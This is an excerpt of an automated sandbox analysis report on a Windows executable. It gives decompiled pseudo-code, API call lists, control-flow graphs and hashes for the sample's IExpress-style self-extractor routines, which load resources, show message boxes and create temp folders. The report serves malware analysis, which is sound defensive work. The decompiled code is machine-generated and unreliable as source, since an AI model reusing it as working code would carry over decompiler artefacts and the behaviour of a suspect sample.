                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00E855CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00E85638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00E8564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E85620
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E856B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00E8571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00E85737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00E857CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00E857EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00E85802
                                                                                                                                                                                                          • Part of subcall function 00E82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00E82654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00E85830
                                                                                                                                                                                                          • Part of subcall function 00E86517: FindResourceA.KERNEL32(00E80000,000007D6,00000005), ref: 00E8652A
                                                                                                                                                                                                          • Part of subcall function 00E86517: LoadResource.KERNEL32(00E80000,00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E86538
                                                                                                                                                                                                          • Part of subcall function 00E86517: DialogBoxIndirectParamA.USER32(00E80000,00000000,00000547,00E819E0,00000000), ref: 00E86557
                                                                                                                                                                                                          • Part of subcall function 00E86517: FreeResource.KERNEL32(00000000,?,?,00E82EE8,00000000,00E819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E86560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00E85878
                                                                                                                                                                                                          • Part of subcall function 00E8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E859A8
                                                                                                                                                                                                          • Part of subcall function 00E8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00E859AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-2740620654
                                                                                                                                                                                                        • Opcode ID: 48493c958927a62cbaac4b4096942a2c2fdf3052dde0dac21f6f5da81881c411
                                                                                                                                                                                                        • Instruction ID: 182c887e837c0d1f2a5ba70ab7913ada5913230dc4f618a88983d5598ce3b11e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48493c958927a62cbaac4b4096942a2c2fdf3052dde0dac21f6f5da81881c411
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B88108B2A04A059EDB24BB719C85BFA72AD9B50304F4420B7F58EF2191EF748D858B51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 e844b9-e844f8 407 e84679-e8467b 406->407 408 e844fe-e84525 LoadStringA 406->408 411 e8467c-e8468c call e86ce0 407->411 409 e84562-e84568 408->409 410 e84527-e8452e call e8681f 408->410 413 e8456b-e84570 409->413 420 e8453f 410->420 421 e84530-e8453d call e867c9 410->421 413->413 416 e84572-e8457c 413->416 418 e845c9-e845cb 416->418 419 e8457e-e84580 416->419 424 e845cd-e845cf 418->424 425 e84607-e84617 LocalAlloc 418->425 422 e84583-e84588 419->422 426 e84544-e84554 MessageBoxA 420->426 421->420 421->426 422->422 429 e8458a-e8458c 422->429 431 e845d2-e845d7 424->431 427 e8455a-e8455d 425->427 428 e8461d-e84628 call e81680 425->428 426->427 427->411 436 e8462d-e8463d MessageBeep call e8681f 428->436 433 e8458f-e84594 429->433 431->431 434 e845d9-e845ed LocalAlloc 431->434 433->433 437 e84596-e845ad LocalAlloc 433->437 434->427 435 e845f3-e84605 call e8171e 434->435 435->436 444 e8464e 436->444 445 e8463f-e8464c call e867c9 436->445 437->427 440 e845af-e845c7 call e8171e 437->440 440->436 448 e84653-e84677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xe88a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xe89a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00E81680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00E8171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00E8681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00E867C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00E8681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00E867C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00e844b9
                                                                                                                                                                                                        0x00e844c4
                                                                                                                                                                                                        0x00e844cb
                                                                                                                                                                                                        0x00e844d8
                                                                                                                                                                                                        0x00e844e4
                                                                                                                                                                                                        0x00e844eb
                                                                                                                                                                                                        0x00e844ee
                                                                                                                                                                                                        0x00e844ef
                                                                                                                                                                                                        0x00e844ef
                                                                                                                                                                                                        0x00e844f1
                                                                                                                                                                                                        0x00e844f7
                                                                                                                                                                                                        0x00e844f8
                                                                                                                                                                                                        0x00e8467b
                                                                                                                                                                                                        0x00e844fe
                                                                                                                                                                                                        0x00e84509
                                                                                                                                                                                                        0x00e84518
                                                                                                                                                                                                        0x00e84525
                                                                                                                                                                                                        0x00e84562
                                                                                                                                                                                                        0x00e84568
                                                                                                                                                                                                        0x00e84568
                                                                                                                                                                                                        0x00e8456b
                                                                                                                                                                                                        0x00e8456b
                                                                                                                                                                                                        0x00e8456d
                                                                                                                                                                                                        0x00e8456e
                                                                                                                                                                                                        0x00e84572
                                                                                                                                                                                                        0x00e84578
                                                                                                                                                                                                        0x00e8457c
                                                                                                                                                                                                        0x00e845cb
                                                                                                                                                                                                        0x00e84607
                                                                                                                                                                                                        0x00e84607
                                                                                                                                                                                                        0x00e8460d
                                                                                                                                                                                                        0x00e84613
                                                                                                                                                                                                        0x00e84617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8461d
                                                                                                                                                                                                        0x00e84623
                                                                                                                                                                                                        0x00e84626
                                                                                                                                                                                                        0x00e84628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84628
                                                                                                                                                                                                        0x00e845cd
                                                                                                                                                                                                        0x00e845cd
                                                                                                                                                                                                        0x00e845cf
                                                                                                                                                                                                        0x00e845cf
                                                                                                                                                                                                        0x00e845d2
                                                                                                                                                                                                        0x00e845d2
                                                                                                                                                                                                        0x00e845d4
                                                                                                                                                                                                        0x00e845d5
                                                                                                                                                                                                        0x00e845db
                                                                                                                                                                                                        0x00e845de
                                                                                                                                                                                                        0x00e845e3
                                                                                                                                                                                                        0x00e845e9
                                                                                                                                                                                                        0x00e845ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e845f3
                                                                                                                                                                                                        0x00e845fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84602
                                                                                                                                                                                                        0x00e845ed
                                                                                                                                                                                                        0x00e8457e
                                                                                                                                                                                                        0x00e8457e
                                                                                                                                                                                                        0x00e84580
                                                                                                                                                                                                        0x00e84580
                                                                                                                                                                                                        0x00e84583
                                                                                                                                                                                                        0x00e84583
                                                                                                                                                                                                        0x00e84585
                                                                                                                                                                                                        0x00e84586
                                                                                                                                                                                                        0x00e8458a
                                                                                                                                                                                                        0x00e8458c
                                                                                                                                                                                                        0x00e8458f
                                                                                                                                                                                                        0x00e8458f
                                                                                                                                                                                                        0x00e84591
                                                                                                                                                                                                        0x00e84592
                                                                                                                                                                                                        0x00e8459b
                                                                                                                                                                                                        0x00e8459e
                                                                                                                                                                                                        0x00e845a3
                                                                                                                                                                                                        0x00e845a9
                                                                                                                                                                                                        0x00e845ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e845af
                                                                                                                                                                                                        0x00e845af
                                                                                                                                                                                                        0x00e845bf
                                                                                                                                                                                                        0x00e8462d
                                                                                                                                                                                                        0x00e84630
                                                                                                                                                                                                        0x00e8463d
                                                                                                                                                                                                        0x00e8464e
                                                                                                                                                                                                        0x00e8464e
                                                                                                                                                                                                        0x00e8463f
                                                                                                                                                                                                        0x00e84640
                                                                                                                                                                                                        0x00e84647
                                                                                                                                                                                                        0x00e8464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8464c
                                                                                                                                                                                                        0x00e84666
                                                                                                                                                                                                        0x00e8466d
                                                                                                                                                                                                        0x00e8466f
                                                                                                                                                                                                        0x00e84675
                                                                                                                                                                                                        0x00e84675
                                                                                                                                                                                                        0x00e845ad
                                                                                                                                                                                                        0x00e84527
                                                                                                                                                                                                        0x00e8452e
                                                                                                                                                                                                        0x00e8453f
                                                                                                                                                                                                        0x00e8453f
                                                                                                                                                                                                        0x00e84530
                                                                                                                                                                                                        0x00e84531
                                                                                                                                                                                                        0x00e84538
                                                                                                                                                                                                        0x00e8453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8453d
                                                                                                                                                                                                        0x00e84554
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e8455a
                                                                                                                                                                                                        0x00e84525
                                                                                                                                                                                                        0x00e8468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E845A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E845E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00E8460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E84630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00E84666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00E8466F
                                                                                                                                                                                                          • Part of subcall function 00E8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E8686E
                                                                                                                                                                                                          • Part of subcall function 00E8681F: GetSystemMetrics.USER32(0000004A), ref: 00E868A7
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E868CC
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,?,0000000C), ref: 00E868F4
                                                                                                                                                                                                          • Part of subcall function 00E8681F: RegCloseKey.ADVAPI32(?), ref: 00E86902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: 09434d01d2fd9dae3dcc750f7f986c3c1147c6d58082fe44435644b21a9adff4
                                                                                                                                                                                                        • Instruction ID: fb891b8b0c3def79bd6567b254ec932506bac710daf3b4dfd2ff870f8524c8f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09434d01d2fd9dae3dcc750f7f986c3c1147c6d58082fe44435644b21a9adff4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251D4B19002169FDB21BF68CC48BAA7BA9EF45304F1451A5FD4DB7281DB319E09CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E853A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00E8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E00E81680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E00E8658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E00E86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xe88a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00e853ac
                                                                                                                                                                                                        0x00e853b3
                                                                                                                                                                                                        0x00e853b9
                                                                                                                                                                                                        0x00e853bb
                                                                                                                                                                                                        0x00e853bd
                                                                                                                                                                                                        0x00e853bf
                                                                                                                                                                                                        0x00e853d1
                                                                                                                                                                                                        0x00e853d6
                                                                                                                                                                                                        0x00e853e0
                                                                                                                                                                                                        0x00e853e2
                                                                                                                                                                                                        0x00e853f5
                                                                                                                                                                                                        0x00e853fb
                                                                                                                                                                                                        0x00e85402
                                                                                                                                                                                                        0x00e8540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85415
                                                                                                                                                                                                        0x00e85416
                                                                                                                                                                                                        0x00e85427
                                                                                                                                                                                                        0x00e8542a
                                                                                                                                                                                                        0x00e8542b
                                                                                                                                                                                                        0x00e85434
                                                                                                                                                                                                        0x00e85434
                                                                                                                                                                                                        0x00e8543a
                                                                                                                                                                                                        0x00e8544c
                                                                                                                                                                                                        0x00e8544c
                                                                                                                                                                                                        0x00e85452
                                                                                                                                                                                                        0x00e8545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8545e
                                                                                                                                                                                                        0x00e8545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8171E: _vsnprintf.MSVCRT ref: 00E81750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E853FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-775753704
                                                                                                                                                                                                        • Opcode ID: eff86466384b3d303812bf6762bd31b55280d0a2b2fdfcf3dcf4b8ed168a21e3
                                                                                                                                                                                                        • Instruction ID: 26fadbe793e70f73c17a5bdaadd9e700cb5f1ae2b39e95f4ad13941801a64fd8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff86466384b3d303812bf6762bd31b55280d0a2b2fdfcf3dcf4b8ed168a21e3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 171104723006046BE320BB279C49FEF76ADEBC1311F041066F65EF2190CE74894A87A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
